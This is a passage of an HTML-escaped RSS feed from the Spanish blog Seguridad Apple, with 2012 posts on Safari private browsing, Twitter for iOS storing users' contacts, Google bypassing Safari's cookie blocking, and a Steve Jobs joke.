&lt;/div&gt;&lt;div class="separator" style="clear: both; text-align: justify;"&gt;Como se puede ver, &lt;i&gt;&lt;b&gt;Apple Safari &lt;/b&gt;&lt;/i&gt;avisa de que se si se activa ese modo de navegación no se guardará ninguna entrada en el historial.&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-_zHN3kqAPE0/T0EelI_P_8I/AAAAAAAADD0/OZynUBek-u8/s1600/HistorialSafari_7.png" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-_zHN3kqAPE0/T0EelI_P_8I/AAAAAAAADD0/OZynUBek-u8/s1600/HistorialSafari_7.png" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 6: Alerta de activación de modo de Navegación Privada&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Sin embargo, la pregunta que surge es: &lt;i&gt;&lt;b&gt;¿Es realmente una navegación privada? ¿Podrá aguantar este modo el escrutinio de un analista forense?&lt;/b&gt;&lt;/i&gt; Mañana más sobre este tema.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-7121183855431777402?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gu7q67jFt6c:OQySy9TTIaE:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gu7q67jFt6c:OQySy9TTIaE:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gu7q67jFt6c:OQySy9TTIaE:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gu7q67jFt6c:OQySy9TTIaE:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gu7q67jFt6c:OQySy9TTIaE:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=gu7q67jFt6c:OQySy9TTIaE:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=gu7q67jFt6c:OQySy9TTIaE:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=gu7q67jFt6c:OQySy9TTIaE:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/gu7q67jFt6c/privacidad-en-apple-safari-el-historial.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://4.bp.blogspot.com/-8lN_mAoClbI/T0EeZrm_AcI/AAAAAAAADDI/7OyhLvRdy-A/s72-c/HistorialSafari_1.png" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/privacidad-en-apple-safari-el-historial.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-1261499328847357880</guid><pubDate>Sun, 19 Feb 2012 07:23:00 +0000</pubDate><atom:updated>2012-02-19T08:23:29.329+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">iPod Touch</category><category domain="http://www.blogger.com/atom/ns#">iPhone</category><category domain="http://www.blogger.com/atom/ns#">iPad</category><category domain="http://www.blogger.com/atom/ns#">Privacidad</category><category domain="http://www.blogger.com/atom/ns#">twitter</category><category domain="http://www.blogger.com/atom/ns#">iOS</category><title>Twitter para iOS envuelto en el escándalo de los contactos</title><description>&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-_lT1WLJcbwQ/Tz4ZFXNopKI/AAAAAAAADCo/m_t7GIbYQNw/s1600/twitterbirdshumble250.jpg" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" height="200" src="http://2.bp.blogspot.com/-_lT1WLJcbwQ/Tz4ZFXNopKI/AAAAAAAADCo/m_t7GIbYQNw/s200/twitterbirdshumble250.jpg" width="200" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
¿Eres uno de los millones de usuarios de &lt;i&gt;&lt;b&gt;Twitter&lt;/b&gt;&lt;/i&gt; en el mundo? Y además, ¿utilizas la herramienta de &lt;i&gt;&lt;b&gt;Twitter para iOS&lt;/b&gt;&lt;/i&gt;? Estás de enhorabuena, ya que si has ejecutado la posibilidad de &lt;i&gt;&lt;b&gt;"Buscar amigos"&lt;/b&gt;&lt;/i&gt; "tus contactos serán de &lt;i&gt;&lt;b&gt;Twitter&lt;/b&gt;&lt;/i&gt; durante 18 meses. Pero... ¿&lt;i&gt;&lt;b&gt;Twitter&lt;/b&gt;&lt;/i&gt; ha informado de ello? La respuesta es no.&lt;br /&gt;
&lt;br /&gt;
Tras el &lt;a href="http://www.seguridadapple.com/2012/02/path-enviaba-los-contactos-sin.html"&gt;escándalo de esta semana con Path&lt;/a&gt;, y visto esto con &lt;i&gt;&lt;b&gt;Twitter&lt;/b&gt;&lt;/i&gt;, está claro que los usuarios debemos extremar las precauciones con nuestra privacidad, y este tipo de herramierntas que son capaces de &lt;i&gt;"gestionar"&lt;/i&gt; nuestros contactos sociales deberían estar más controladas.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;i&gt;&lt;b&gt;Twitter&lt;/b&gt;&lt;/i&gt; ha informado, &lt;a href="http://nakedsecurity.sophos.com/2012/02/16/twitter-tarnished-by-iphone-contact-scandal/"&gt;según reporta Naked Security&lt;/a&gt;, que en las próximas actualizaciones mostrarán explícitamente lo que sucede cuando se ejecuta la opción de &lt;i&gt;&lt;b&gt;"Buscar amigos"&lt;/b&gt;&lt;/i&gt;, de manera que el usuario quede totalmente informado. Realmente sería sencillo, ya que bastaría con que&lt;i&gt;&lt;b&gt; Twitter &lt;/b&gt;&lt;/i&gt;pusiera un mensaje del tipo:&lt;br /&gt;
&lt;blockquote class="tr_bq"&gt;
&lt;i&gt;&lt;b&gt;"Al seleccionar esta opción está permitiendo que Twitter almacene sus contactos personales de su libreta de direcciones, ¿Desea continuar?"&lt;/b&gt;&lt;/i&gt;&lt;/blockquote&gt;
Realmente explícito y sencillo de entender, y que sea ya el usuario el que elija si su privacidad vale más que encontrar a los amigos automáticamente en &lt;i&gt;&lt;b&gt;Twitter&lt;/b&gt;&lt;/i&gt;. Quizá un gran número de personas no ejecuten esta opción por el simple hecho de que su libreta será compartida, pero &lt;i&gt;&lt;b&gt;Twitter&lt;/b&gt;&lt;/i&gt; deberá disponer de un mensaje claro y conciso para no recibir las críticas con su política de actuación.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://4.bp.blogspot.com/-qH1kzAXKIis/Tz4b13gnEKI/AAAAAAAADCw/N1t2QEuPtQw/s1600/209776580-14174032.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://4.bp.blogspot.com/-qH1kzAXKIis/Tz4b13gnEKI/AAAAAAAADCw/N1t2QEuPtQw/s640/209776580-14174032.jpg" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Opción de Buscar amigos que entrega los contactos a Twitter&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;
&lt;i&gt;&lt;b&gt;Twitter&lt;/b&gt;&lt;/i&gt; no es el único que realiza estas acciones "oscuras", también grandes empresas como &lt;i&gt;&lt;b&gt;Foursquare, Viber, WhatsApp, Instagram, Path o Hipster&lt;/b&gt;&lt;/i&gt; utilizan esta técnica o similares. Apple ha prometido vigilar más el como la información de los usuarios es solicitada en las aplicaciones del App Store.&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div style="text-align: justify;"&gt;
De todas formas los usuarios deberían estar mas concienciados, ya que no hay magia y solo es tecnología así que cualquier persona con ciertas nociones técnicas debe "presuponer" que para poder localizar a sus amigos, la herramienta primero necesita saber quiénes son todos sus amigos, parece evidente. Aún así, es obligación de la red social de turno el no aprovecharse del desconocimiento de éstos. Las redes sociales necesitan de los usuarios para poder tener éxito, pero deben ser menos agresivos a la hora de conseguirlos.&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-1261499328847357880?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=cXHYP73JfsM:xfu4keqP9I0:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=cXHYP73JfsM:xfu4keqP9I0:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=cXHYP73JfsM:xfu4keqP9I0:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=cXHYP73JfsM:xfu4keqP9I0:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=cXHYP73JfsM:xfu4keqP9I0:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=cXHYP73JfsM:xfu4keqP9I0:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=cXHYP73JfsM:xfu4keqP9I0:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=cXHYP73JfsM:xfu4keqP9I0:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/cXHYP73JfsM/twitter-para-ios-envuelto-en-el.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-_lT1WLJcbwQ/Tz4ZFXNopKI/AAAAAAAADCo/m_t7GIbYQNw/s72-c/twitterbirdshumble250.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/twitter-para-ios-envuelto-en-el.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-108028757457147716</guid><pubDate>Sat, 18 Feb 2012 06:00:00 +0000</pubDate><atom:updated>2012-02-18T07:01:19.678+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">Privacidad</category><category domain="http://www.blogger.com/atom/ns#">Safari</category><category domain="http://www.blogger.com/atom/ns#">Google</category><title>Google espiaba la navegación de los usuarios de Safari</title><description>&lt;div style="text-align: justify;"&gt;Hace un par de días desde &lt;a href="http://www.seguridadapple.com/"&gt;Seguridad Apple&lt;/a&gt; os contábamos los &lt;a href="http://www.seguridadapple.com/2012/02/path-enviaba-los-contactos-sin.html"&gt;problemas que habían surgido con la aplicación Path&lt;/a&gt; que - a pesar de que han corregido el error en su nueva versión - han suscitado un gran debate sobre el uso y acceso de los datos del usuario sin solicitar su consentimiento. Esos casos se unen al gran debate de la privacidad del usuario frente a los sitios de Internet que toman datos del usuario para tener mejor &lt;i&gt;"documentadas"&lt;/i&gt; todas las acciones que realiza un usuario.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;En ese escándalo &lt;a href="http://www.huffingtonpost.com/2011/09/26/facebook-logout-cookies-privacy-tracking_n_980838.html"&gt;se vio envuelto hace tiempo Facebook&lt;/a&gt;, que incluía una cookie en las sesiones de navegación de sus visitantes que le permitía tomar datos, e incluso &lt;a href="http://www.securitybydefault.com/2010/12/youporn-practica-el-voyeurismo-con-sus.html"&gt;sitios de contenido adulto que inspeccionaban el historial de navegación de cualquier visitante&lt;/a&gt;.&amp;nbsp;A ellos se une ahora un &lt;a href="http://online.wsj.com/article_email/SB10001424052970204880404577225380456599176-lMyQjAxMTAyMDEwNjExNDYyWj.html"&gt;escándalo con Google publicado en el Wall Street Journal&lt;/a&gt;, del que tanto ellos, como ciertas empresas de publicidad se han aprovechado de un código de seguimiento de &lt;i&gt;&lt;b&gt;Google&lt;/b&gt;&lt;/i&gt; que permite rastrear los hábitos de navegación de usuarios que utilizan el navegador &lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt;, es decir, especialmente usuarios de Mac OS X e iOS.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Al parecer &lt;i&gt;&lt;b&gt;Google&lt;/b&gt;&lt;/i&gt; ha dejado de utilizar el código tras ser contactado por el periódico Wall Street Journal que habría sido informado de ello por &lt;i&gt;&lt;b&gt;Jonathan Mayer&lt;/b&gt;&lt;/i&gt; de la &lt;i&gt;&lt;b&gt;Universidad de Standford,&lt;/b&gt;&lt;/i&gt;&amp;nbsp; especialista en analizar este tipo de cuestiones. Según el periódico, este código ha sido encontrado en 22 de los 100 sitios web investigados y en 23 anuncios para iPhone.&amp;nbsp;&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
Hay que tener en cuenta que la legislación en muchos países exige que los navegadores den al usuario herramientas de privacidad para, entre otras cosas, evitar la inserción de cookies o códigos de rastreo de empresas. Por eso, el navegador&amp;nbsp;&lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt;&amp;nbsp;está configurado para bloquear las cookies de terceros de forma predeterminada.&lt;br /&gt;
&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-XcV6FklNeIg/Tz8-Nl2fIqI/AAAAAAAADDA/2iL-LrgJL98/s1600/SafariPrivacy.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-XcV6FklNeIg/Tz8-Nl2fIqI/AAAAAAAADDA/2iL-LrgJL98/s640/SafariPrivacy.jpg" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Opciones de Privacidad en Apple Safari para Mac OS X&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Sin embargo, estos anuncios insertan un &lt;i&gt;&lt;b&gt;iframe&lt;/b&gt;&lt;/i&gt; con un formulario transparente que permite hasta recoger datos de la cuenta de &lt;i&gt;&lt;b&gt;Google Plus&lt;/b&gt;&lt;/i&gt;, si hubiera alguna, que está conectada en la sesión, pero sólo y exclusivamente si es un navegador &lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt;. Una vez el código se activa puede permitir que &lt;i&gt;&lt;b&gt;Google&lt;/b&gt;&lt;/i&gt; haga el seguimiento del usuario marcado por el anuncio a través de un gran número de sitios web.&amp;nbsp;Mediante la inserción del código &lt;i&gt;&lt;b&gt;HTML&lt;/b&gt;&lt;/i&gt; desde el dominio de &lt;i&gt;&lt;b&gt;Google&lt;/b&gt;&lt;/i&gt; es posible saltarse la configuración de estos parámetros de seguridad para permitir el traceo, ya que será &lt;i&gt;&lt;b&gt;Google&lt;/b&gt;&lt;/i&gt; el que esté ayudando a la empresa de publicidad a hacer el seguimiento. Todo el proceso se explica en el siguiente gráfico publicado en el artículo.&lt;/div&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://2.bp.blogspot.com/-l-ZUl_QvSlY/Tz89cwO0bEI/AAAAAAAADC4/RMas68OXYyY/s1600/SafariTrackingCode.gif" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-l-ZUl_QvSlY/Tz89cwO0bEI/AAAAAAAADC4/RMas68OXYyY/s640/SafariTrackingCode.gif" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figrura 2: Gráfico descriptivo del proceso&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;div style="text-align: justify;"&gt;&lt;br /&gt;
&lt;/div&gt;&lt;div style="text-align: justify;"&gt;Apple ha confirmado estar trabajando en la solución del problema de la privacidad como éste en su navegador &lt;i&gt;&lt;b&gt;Apple Safari&lt;/b&gt;&lt;/i&gt;.&amp;nbsp;Mientras,&lt;i&gt;&lt;b&gt; Google&lt;/b&gt;&lt;/i&gt; se defiende alegando que no recopila datos personales, pero ha dejado de utilizar esta práctica desde ya.&amp;nbsp;Pese a esto, &lt;i&gt;&lt;b&gt;Google&lt;/b&gt;&lt;/i&gt;, se enfrenta a la posibilidad de grandes multas de la &lt;i&gt;&lt;b&gt;Comisión Federal del Gobierno de EEUU&lt;/b&gt;&lt;/i&gt; en el caso de que la agencia estime que ha violado su acuerdo de privacidad. &lt;i&gt;&lt;b&gt;¡Google, Don´t be Evil!&lt;/b&gt;&lt;/i&gt;&lt;/div&gt;&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-108028757457147716?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=NYR7LcVodbo:NLBMQrvEL6M:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=NYR7LcVodbo:NLBMQrvEL6M:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=NYR7LcVodbo:NLBMQrvEL6M:ecdYMiMMAMM"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=ecdYMiMMAMM" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=NYR7LcVodbo:NLBMQrvEL6M:I9og5sOYxJI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?d=I9og5sOYxJI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=NYR7LcVodbo:NLBMQrvEL6M:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=NYR7LcVodbo:NLBMQrvEL6M:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/Seguridadapple?a=NYR7LcVodbo:NLBMQrvEL6M:F7zBnMyn0Lo"&gt;&lt;img src="http://feeds.feedburner.com/~ff/Seguridadapple?i=NYR7LcVodbo:NLBMQrvEL6M:F7zBnMyn0Lo" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;</description><link>http://feedproxy.google.com/~r/Seguridadapple/~3/NYR7LcVodbo/google-vigilaba-la-navegacion-de-los.html</link><author>noreply@blogger.com (SeguridadApple)</author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://3.bp.blogspot.com/-XcV6FklNeIg/Tz8-Nl2fIqI/AAAAAAAADDA/2iL-LrgJL98/s72-c/SafariPrivacy.jpg" height="72" width="72" /><thr:total>0</thr:total><feedburner:origLink>http://www.seguridadapple.com/2012/02/google-vigilaba-la-navegacion-de-los.html</feedburner:origLink></item><item><guid isPermaLink="false">tag:blogger.com,1999:blog-7727366960388490644.post-2048596332217598091</guid><pubDate>Fri, 17 Feb 2012 12:30:00 +0000</pubDate><atom:updated>2012-02-17T13:30:01.674+01:00</atom:updated><category domain="http://www.blogger.com/atom/ns#">iPad</category><category domain="http://www.blogger.com/atom/ns#">Steve Jobs</category><category domain="http://www.blogger.com/atom/ns#">Humor</category><title>Steve Jobs está haciendo cambios en el cielo...</title><description>&lt;div style="text-align: justify;"&gt;Que &lt;i&gt;&lt;b&gt;Steve Jobs&lt;/b&gt;&lt;/i&gt; cambió un poco la manera en que vivimos en sociedad hoy en día es innegable. Sus productos, y la forma de usarlos que él pensó, están dentro de nuestras vidas. Lo que nunca pensamos en el pasado es que llegarían a cambiar aspectos tan antiguos como comunicarnos con &lt;i&gt;&lt;b&gt;Dios&lt;/b&gt;&lt;/i&gt;.&lt;/div&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-QWRnc-PHcq0/Tz1oSUfkCeI/AAAAAAAADCQ/EYmz1N6kifQ/s1600/Curia_iPad.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-QWRnc-PHcq0/Tz1oSUfkCeI/AAAAAAAADCQ/EYmz1N6kifQ/s1600/Curia_iPad.jpg" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 1: Visto en &lt;a href="http://www.segnorasque.com/2012/02/la-iglesia-se-moderniza.html"&gt;Señoras Que&lt;/a&gt;&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;div style="text-align: justify;"&gt;Y es que las especulaciones de que algo iba a cambiar en el cielo comenzaron desde el momento en &lt;i&gt;&lt;b&gt;Steve Jobs&lt;/b&gt;&lt;/i&gt; nos abandonó.&lt;br /&gt;
&lt;br /&gt;
&lt;/div&gt;&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://1.bp.blogspot.com/-tZ0sfRUjurs/Tz1oYw4ajCI/AAAAAAAADCg/GsxJdmlKL_k/s1600/Jobs_Cielo2.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://1.bp.blogspot.com/-tZ0sfRUjurs/Tz1oYw4ajCI/AAAAAAAADCg/GsxJdmlKL_k/s1600/Jobs_Cielo2.jpg" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 2: "Moisés, te presento a Steve Jobs. Él va a actualizar tus tablas"&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
&lt;table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"&gt;&lt;tbody&gt;
&lt;tr&gt;&lt;td style="text-align: center;"&gt;&lt;a href="http://3.bp.blogspot.com/-byeeBWAekpA/Tz1oXpxmYXI/AAAAAAAADCY/q6iQiMxDhlM/s1600/JobsCielo_1.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"&gt;&lt;img border="0" src="http://3.bp.blogspot.com/-byeeBWAekpA/Tz1oXpxmYXI/AAAAAAAADCY/q6iQiMxDhlM/s1600/JobsCielo_1.jpg" width="540" /&gt;&lt;/a&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;tr&gt;&lt;td class="tr-caption" style="text-align: center;"&gt;&lt;i&gt;Figura 3: "Para ser honesto, señor Jobs, la última vez que una manzana causó mucho&lt;br /&gt;
revuelo por aquí afectó a Adán, Eva y una serpiente.."&lt;/i&gt;&lt;/td&gt;&lt;/tr&gt;
&lt;/tbody&gt;&lt;/table&gt;&lt;br /&gt;
Buen fin de semana.&lt;div class="blogger-post-footer"&gt;&lt;br/&gt;Descubre en este libro cómo funciona el mundo del &lt;a href="http://www.informatica64.com/libros.aspx?id=fonline"&gt;Fraude Online&lt;/a&gt;&lt;br/&gt;&lt;br/&gt;
Publicado en &lt;a href="http://www.seguridadapple.com" target="new"&gt;Seguridad Apple&lt;/a&gt; - 
Suscríbete al &lt;a href="http://feeds.feedburner.com/Seguridadapple"&gt;canal RSS &lt;/a&gt; - Sigue &lt;a href="https://plus.google.com/111010890582588306653/posts"&gt;Seguridad Apple en Google+&lt;/a&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/7727366960388490644-2048596332217598091?l=www.seguridadapple.com' alt='' /&gt;&lt;/div&gt;&lt;div class="feedflare"&gt;
